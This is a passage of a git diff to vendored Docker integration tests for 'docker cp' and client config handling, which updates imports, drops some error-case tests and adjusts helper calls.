or we need to be able to use - // os/user but user.Current() only works if we aren't statically compiling - - var headers map[string][]string - - server := httptest.NewServer(http.HandlerFunc( - func(w http.ResponseWriter, r *http.Request) { - w.Header().Set("API-Version", api.DefaultVersion) - headers = r.Header - })) - defer server.Close() - - homeKey := homedir.Key() - homeVal := homedir.Get() - tmpDir, err := ioutil.TempDir("", "fake-home") - c.Assert(err, checker.IsNil) - defer os.RemoveAll(tmpDir) - - dotDocker := filepath.Join(tmpDir, ".docker") - os.Mkdir(dotDocker, 0600) - tmpCfg := filepath.Join(dotDocker, "config.json") - - defer func() { os.Setenv(homeKey, homeVal) }() - os.Setenv(homeKey, tmpDir) - - data := `{ - "HttpHeaders": { "MyHeader": "MyValue" } - }` - - err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) - c.Assert(err, checker.IsNil) - - cmd := exec.Command(dockerBinary, "-H="+server.URL[7:], "ps") - out, _, _ := runCommandWithOutput(cmd) - - c.Assert(headers["User-Agent"], checker.NotNil, check.Commentf("Missing User-Agent")) - - c.Assert(headers["User-Agent"][0], checker.Equals, "Docker-Client/"+dockerversion.Version+" ("+runtime.GOOS+")", check.Commentf("Badly formatted User-Agent,out:%v", out)) - - c.Assert(headers["Myheader"], checker.NotNil) - c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("Missing/bad header,out:%v", out)) - -} - -func (s *DockerSuite) TestConfigDir(c *check.C) { - cDir, err := ioutil.TempDir("", "fake-home") - c.Assert(err, checker.IsNil) - defer os.RemoveAll(cDir) - - // First make sure pointing to empty dir doesn't generate an error - dockerCmd(c, "--config", cDir, "ps") - - // Test with env var too - cmd := exec.Command(dockerBinary, "ps") - cmd.Env = appendBaseEnv(true, "DOCKER_CONFIG="+cDir) - out, _, err := runCommandWithOutput(cmd) - - c.Assert(err, checker.IsNil, check.Commentf("ps2 didn't work,out:%v", out)) - - // Start a server so we can check to see if the config file was - // 
loaded properly - var headers map[string][]string - - server := httptest.NewServer(http.HandlerFunc( - func(w http.ResponseWriter, r *http.Request) { - headers = r.Header - })) - defer server.Close() - - // Create a dummy config file in our new config dir - data := `{ - "HttpHeaders": { "MyHeader": "MyValue" } - }` - - tmpCfg := filepath.Join(cDir, "config.json") - err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) - c.Assert(err, checker.IsNil, check.Commentf("Err creating file")) - - env := appendBaseEnv(false) - - cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps") - cmd.Env = env - out, _, err = runCommandWithOutput(cmd) - - c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) - c.Assert(headers["Myheader"], checker.NotNil) - c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps3 - Missing header,out:%v", out)) - - // Reset headers and try again using env var this time - headers = map[string][]string{} - cmd = exec.Command(dockerBinary, "-H="+server.URL[7:], "ps") - cmd.Env = append(env, "DOCKER_CONFIG="+cDir) - out, _, err = runCommandWithOutput(cmd) - - c.Assert(err, checker.NotNil, check.Commentf("%v", out)) - c.Assert(headers["Myheader"], checker.NotNil) - c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps4 - Missing header,out:%v", out)) - - // Reset headers and make sure flag overrides the env var - headers = map[string][]string{} - cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps") - cmd.Env = append(env, "DOCKER_CONFIG=MissingDir") - out, _, err = runCommandWithOutput(cmd) - - c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) - c.Assert(headers["Myheader"], checker.NotNil) - c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps5 - Missing header,out:%v", out)) - - // Reset headers and make sure flag overrides the env var. 
- // Almost same as previous but make sure the "MissingDir" isn't - // ignore - we don't want to default back to the env var. - headers = map[string][]string{} - cmd = exec.Command(dockerBinary, "--config", "MissingDir", "-H="+server.URL[7:], "ps") - cmd.Env = append(env, "DOCKER_CONFIG="+cDir) - out, _, err = runCommandWithOutput(cmd) - - c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) - c.Assert(headers["Myheader"], checker.IsNil, check.Commentf("ps6 - Headers shouldn't be the expected value,out:%v", out)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go index 9ed7e8c720..499be54522 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go @@ -4,12 +4,10 @@ import ( "os" "path/filepath" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) -// docker cp CONTAINER:PATH LOCALPATH - // Try all of the test cases from the archive package which implements the // internals of `docker cp` and ensure that the behavior matches when actually // copying to and from containers. @@ -20,96 +18,9 @@ import ( // 3. DST parent directory must exist. // 4. If DST exists as a file, it must not end with a trailing separator. -// First get these easy error cases out of the way. - -// Test for error when SRC does not exist. 
-func (s *DockerSuite) TestCpFromErrSrcNotExists(c *check.C) { - containerID := makeTestContainer(c, testContainerOptions{}) - - tmpDir := getTestDir(c, "test-cp-from-err-src-not-exists") - defer os.RemoveAll(tmpDir) - - err := runDockerCp(c, containerCpPath(containerID, "file1"), tmpDir) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) -} - -// Test for error when SRC ends in a trailing -// path separator but it exists as a file. -func (s *DockerSuite) TestCpFromErrSrcNotDir(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := makeTestContainer(c, testContainerOptions{addContent: true}) - - tmpDir := getTestDir(c, "test-cp-from-err-src-not-dir") - defer os.RemoveAll(tmpDir) - - err := runDockerCp(c, containerCpPathTrailingSep(containerID, "file1"), tmpDir) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) -} - -// Test for error when SRC is a valid file or directory, -// bu the DST parent directory does not exist. -func (s *DockerSuite) TestCpFromErrDstParentNotExists(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := makeTestContainer(c, testContainerOptions{addContent: true}) - - tmpDir := getTestDir(c, "test-cp-from-err-dst-parent-not-exists") - defer os.RemoveAll(tmpDir) - - makeTestContentInDir(c, tmpDir) - - // Try with a file source. - srcPath := containerCpPath(containerID, "/file1") - dstPath := cpPath(tmpDir, "notExists", "file1") - - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) - - // Try with a directory source. 
- srcPath = containerCpPath(containerID, "/dir1") - - err = runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) -} - -// Test for error when DST ends in a trailing -// path separator but exists as a file. -func (s *DockerSuite) TestCpFromErrDstNotDir(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := makeTestContainer(c, testContainerOptions{addContent: true}) - - tmpDir := getTestDir(c, "test-cp-from-err-dst-not-dir") - defer os.RemoveAll(tmpDir) - - makeTestContentInDir(c, tmpDir) - - // Try with a file source. - srcPath := containerCpPath(containerID, "/file1") - dstPath := cpPathTrailingSep(tmpDir, "file1") - - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) - - // Try with a directory source. - srcPath = containerCpPath(containerID, "/dir1") - - err = runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) -} - // Check that copying from a container to a local symlink copies to the symlink // target and does not overwrite the local symlink itself. +// TODO: move to docker/cli and/or integration/container/copy_test.go func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { testRequires(c, DaemonIsLinux) containerID := makeTestContainer(c, testContainerOptions{addContent: true}) @@ -124,7 +35,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { srcPath := containerCpPath(containerID, "/file2") dstPath := cpPath(tmpDir, "symlinkToFile1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. 
c.Assert(symlinkTargetEquals(c, dstPath, "file1"), checker.IsNil) @@ -136,7 +47,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { // should copy the file into the symlink target directory. dstPath = cpPath(tmpDir, "symlinkToDir1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil) @@ -149,7 +60,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { // the contents of the source file. dstPath = cpPath(tmpDir, "brokenSymlinkToFileX") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, dstPath, "fileX"), checker.IsNil) @@ -163,7 +74,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { srcPath = containerCpPath(containerID, "/dir2") dstPath = cpPath(tmpDir, "symlinkToDir1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil) @@ -177,7 +88,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { // should not modify the symlink. dstPath = cpPath(tmpDir, "brokenSymlinkToDirX") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. 
c.Assert(symlinkTargetEquals(c, dstPath, "dirX"), checker.IsNil) @@ -217,7 +128,7 @@ func (s *DockerSuite) TestCpFromCaseA(c *check.C) { srcPath := containerCpPath(containerID, "/root/file1") dstPath := cpPath(tmpDir, "itWorks.txt") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) } @@ -235,7 +146,7 @@ func (s *DockerSuite) TestCpFromCaseB(c *check.C) { srcPath := containerCpPath(containerID, "/file1") dstDir := cpPathTrailingSep(tmpDir, "testDir") - err := runDockerCp(c, srcPath, dstDir) + err := runDockerCp(c, srcPath, dstDir, nil) c.Assert(err, checker.NotNil) c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err)) @@ -260,7 +171,7 @@ func (s *DockerSuite) TestCpFromCaseC(c *check.C) { // Ensure the local file starts with different content. c.Assert(fileContentEquals(c, dstPath, "file2\n"), checker.IsNil) - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) } @@ -285,7 +196,7 @@ func (s *DockerSuite) TestCpFromCaseD(c *check.C) { _, err := os.Stat(dstPath) c.Assert(os.IsNotExist(err), checker.True, check.Commentf("did not expect dstPath %q to exist", dstPath)) - c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) @@ -299,7 +210,7 @@ func (s *DockerSuite) TestCpFromCaseD(c *check.C) { dstDir = cpPathTrailingSep(tmpDir, "dir1") - c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) } @@ -319,7 +230,7 @@ func (s *DockerSuite) TestCpFromCaseE(c *check.C) { dstDir := 
cpPath(tmpDir, "testDir") dstPath := filepath.Join(dstDir, "file1-1") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) @@ -330,7 +241,7 @@ func (s *DockerSuite) TestCpFromCaseE(c *check.C) { dstDir = cpPathTrailingSep(tmpDir, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) } @@ -351,7 +262,7 @@ func (s *DockerSuite) TestCpFromCaseF(c *check.C) { srcDir := containerCpPath(containerID, "/root/dir1") dstFile := cpPath(tmpDir, "file1") - err := runDockerCp(c, srcDir, dstFile) + err := runDockerCp(c, srcDir, dstFile, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) @@ -376,7 +287,7 @@ func (s *DockerSuite) TestCpFromCaseG(c *check.C) { resultDir := filepath.Join(dstDir, "dir1") dstPath := filepath.Join(resultDir, "file1-1") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) @@ -390,7 +301,7 @@ func (s *DockerSuite) TestCpFromCaseG(c *check.C) { dstDir = cpPathTrailingSep(tmpDir, "dir2") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) } @@ -410,7 +321,7 @@ func (s *DockerSuite) TestCpFromCaseH(c *check.C) { dstDir := cpPath(tmpDir, "testDir") dstPath := filepath.Join(dstDir, "file1-1") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) @@ -421,7 +332,7 @@ func (s 
*DockerSuite) TestCpFromCaseH(c *check.C) { dstDir = cpPathTrailingSep(tmpDir, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) } @@ -443,7 +354,7 @@ func (s *DockerSuite) TestCpFromCaseI(c *check.C) { srcDir := containerCpPathTrailingSep(containerID, "/root/dir1") + "." dstFile := cpPath(tmpDir, "file1") - err := runDockerCp(c, srcDir, dstFile) + err := runDockerCp(c, srcDir, dstFile, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) @@ -468,7 +379,7 @@ func (s *DockerSuite) TestCpFromCaseJ(c *check.C) { dstDir := cpPath(tmpDir, "dir2") dstPath := filepath.Join(dstDir, "file1-1") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) @@ -482,7 +393,7 @@ func (s *DockerSuite) TestCpFromCaseJ(c *check.C) { dstDir = cpPathTrailingSep(tmpDir, "dir2") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go index 4e5c39e998..ec53712fab 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go @@ -10,9 +10,9 @@ import ( "path/filepath" "strings" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) const ( @@ -27,7 +27,7 @@ const ( // Ensure that 
an all-local path case returns an error. func (s *DockerSuite) TestCpLocalOnly(c *check.C) { - err := runDockerCp(c, "foo", "bar") + err := runDockerCp(c, "foo", "bar", nil) c.Assert(err, checker.NotNil) c.Assert(err.Error(), checker.Contains, "must specify at least one container source") @@ -379,7 +379,7 @@ func (s *DockerSuite) TestCpSymlinkComponent(c *check.C) { // Check that cp with unprivileged user doesn't return any error func (s *DockerSuite) TestCpUnprivilegedUser(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) testRequires(c, UnixCli) // uses chmod/su: not available on windows out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "touch "+cpTestName) @@ -421,7 +421,7 @@ func (s *DockerSuite) TestCpSpecialFiles(c *check.C) { // Copy actual /etc/resolv.conf dockerCmd(c, "cp", containerID+":/etc/resolv.conf", outDir) - expected, err := readContainerFile(containerID, "resolv.conf") + expected := readContainerFile(c, containerID, "resolv.conf") actual, err := ioutil.ReadFile(outDir + "/resolv.conf") // Expected copied file to be duplicate of the container resolvconf @@ -430,7 +430,7 @@ func (s *DockerSuite) TestCpSpecialFiles(c *check.C) { // Copy actual /etc/hosts dockerCmd(c, "cp", containerID+":/etc/hosts", outDir) - expected, err = readContainerFile(containerID, "hosts") + expected = readContainerFile(c, containerID, "hosts") actual, err = ioutil.ReadFile(outDir + "/hosts") // Expected copied file to be duplicate of the container hosts @@ -439,8 +439,9 @@ func (s *DockerSuite) TestCpSpecialFiles(c *check.C) { // Copy actual /etc/resolv.conf dockerCmd(c, "cp", containerID+":/etc/hostname", outDir) - expected, err = readContainerFile(containerID, "hostname") + expected = readContainerFile(c, containerID, "hostname") actual, err = ioutil.ReadFile(outDir + "/hostname") + c.Assert(err, checker.IsNil) // Expected copied file to be duplicate of the container resolvconf c.Assert(bytes.Equal(actual, 
expected), checker.True) @@ -533,6 +534,7 @@ func (s *DockerSuite) TestCpToDot(c *check.C) { c.Assert(os.Chdir(tmpdir), checker.IsNil) dockerCmd(c, "cp", containerID+":/test", ".") content, err := ioutil.ReadFile("./test") + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Equals, "lololol\n") } @@ -545,7 +547,7 @@ func (s *DockerSuite) TestCpToStdout(c *check.C) { // failed to set up container c.Assert(strings.TrimSpace(out), checker.Equals, "0") - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "cp", containerID+":/test", "-"), exec.Command("tar", "-vtf", "-")) @@ -571,6 +573,7 @@ func (s *DockerSuite) TestCpNameHasColon(c *check.C) { defer os.RemoveAll(tmpdir) dockerCmd(c, "cp", containerID+":/te:s:t", tmpdir) content, err := ioutil.ReadFile(tmpdir + "/te:s:t") + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Equals, "lololol\n") } @@ -652,6 +655,7 @@ func (s *DockerSuite) TestCpSymlinkFromConToHostFollowSymlink(c *check.C) { dockerCmd(c, "cp", "-L", cleanedContainerID+":"+"/dir_link", expectedPath) actual, err = ioutil.ReadFile(expectedPath) + c.Assert(err, checker.IsNil) if !bytes.Equal(actual, expected) { c.Fatalf("Expected copied file to be duplicate of the container symbol link target") diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go index f981cb8f8b..77567a3b95 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go @@ -3,12 +3,10 @@ package main import ( "os" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) -// docker cp LOCALPATH CONTAINER:PATH - // Try all of the test cases from the archive package which implements 
the // internals of `docker cp` and ensure that the behavior matches when actually // copying to and from containers. @@ -19,108 +17,6 @@ import ( // 3. DST parent directory must exist. // 4. If DST exists as a file, it must not end with a trailing separator. -// First get these easy error cases out of the way. - -// Test for error when SRC does not exist. -func (s *DockerSuite) TestCpToErrSrcNotExists(c *check.C) { - containerID := makeTestContainer(c, testContainerOptions{}) - - tmpDir := getTestDir(c, "test-cp-to-err-src-not-exists") - defer os.RemoveAll(tmpDir) - - srcPath := cpPath(tmpDir, "file1") - dstPath := containerCpPath(containerID, "file1") - - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) -} - -// Test for error when SRC ends in a trailing -// path separator but it exists as a file. -func (s *DockerSuite) TestCpToErrSrcNotDir(c *check.C) { - containerID := makeTestContainer(c, testContainerOptions{}) - - tmpDir := getTestDir(c, "test-cp-to-err-src-not-dir") - defer os.RemoveAll(tmpDir) - - makeTestContentInDir(c, tmpDir) - - srcPath := cpPathTrailingSep(tmpDir, "file1") - dstPath := containerCpPath(containerID, "testDir") - - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) -} - -// Test for error when SRC is a valid file or directory, -// bu the DST parent directory does not exist. -func (s *DockerSuite) TestCpToErrDstParentNotExists(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := makeTestContainer(c, testContainerOptions{addContent: true}) - - tmpDir := getTestDir(c, "test-cp-to-err-dst-parent-not-exists") - defer os.RemoveAll(tmpDir) - - makeTestContentInDir(c, tmpDir) - - // Try with a file source. 
- srcPath := cpPath(tmpDir, "file1") - dstPath := containerCpPath(containerID, "/notExists", "file1") - - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) - - // Try with a directory source. - srcPath = cpPath(tmpDir, "dir1") - - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) -} - -// Test for error when DST ends in a trailing path separator but exists as a -// file. Also test that we cannot overwrite an existing directory with a -// non-directory and cannot overwrite an existing -func (s *DockerSuite) TestCpToErrDstNotDir(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := makeTestContainer(c, testContainerOptions{addContent: true}) - - tmpDir := getTestDir(c, "test-cp-to-err-dst-not-dir") - defer os.RemoveAll(tmpDir) - - makeTestContentInDir(c, tmpDir) - - // Try with a file source. - srcPath := cpPath(tmpDir, "dir1/file1-1") - dstPath := containerCpPathTrailingSep(containerID, "file1") - - // The client should encounter an error trying to stat the destination - // and then be unable to copy since the destination is asserted to be a - // directory but does not exist. - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExist error, but got %T: %s", err, err)) - - // Try with a directory source. - srcPath = cpPath(tmpDir, "dir1") - - // The client should encounter an error trying to stat the destination and - // then decide to extract to the parent directory instead with a rebased - // name in the source archive, but this directory would overwrite the - // existing file with the same name. 
- err = runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCannotOverwriteNonDirWithDir(err), checker.True, check.Commentf("expected CannotOverwriteNonDirWithDir error, but got %T: %s", err, err)) -} - // Check that copying from a local path to a symlink in a container copies to // the symlink target and does not overwrite the container symlink itself. func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { @@ -143,7 +39,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { srcPath := cpPath(testVol, "file2") dstPath := containerCpPath(containerID, "/vol2/symlinkToFile1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToFile1"), "file1"), checker.IsNil) @@ -155,7 +51,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { // This should copy the file into the symlink target directory. dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil) @@ -168,7 +64,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { // contents of the source file. dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToFileX") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. 
c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToFileX"), "fileX"), checker.IsNil) @@ -182,7 +78,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { srcPath = cpPath(testVol, "/dir2") dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil) @@ -196,7 +92,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { // should not modify the symlink. dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToDirX") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToDirX"), "dirX"), checker.IsNil) @@ -237,7 +133,7 @@ func (s *DockerSuite) TestCpToCaseA(c *check.C) { srcPath := cpPath(tmpDir, "file1") dstPath := containerCpPath(containerID, "/root/itWorks.txt") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) } @@ -258,7 +154,7 @@ func (s *DockerSuite) TestCpToCaseB(c *check.C) { srcPath := cpPath(tmpDir, "file1") dstDir := containerCpPathTrailingSep(containerID, "testDir") - err := runDockerCp(c, srcPath, dstDir) + err := runDockerCp(c, srcPath, dstDir, nil) c.Assert(err, checker.NotNil) c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err)) @@ -284,7 +180,7 @@ func (s *DockerSuite) TestCpToCaseC(c *check.C) { // Ensure the container's file starts with the original content. 
c.Assert(containerStartOutputEquals(c, containerID, "file2\n"), checker.IsNil) - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // Should now contain file1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) @@ -311,7 +207,7 @@ func (s *DockerSuite) TestCpToCaseD(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil) // Should now contain file1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) @@ -329,7 +225,7 @@ func (s *DockerSuite) TestCpToCaseD(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil) // Should now contain file1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) @@ -352,7 +248,7 @@ func (s *DockerSuite) TestCpToCaseE(c *check.C) { srcDir := cpPath(tmpDir, "dir1") dstDir := containerCpPath(containerID, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -366,7 +262,7 @@ func (s *DockerSuite) TestCpToCaseE(c *check.C) { dstDir = containerCpPathTrailingSep(containerID, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. 
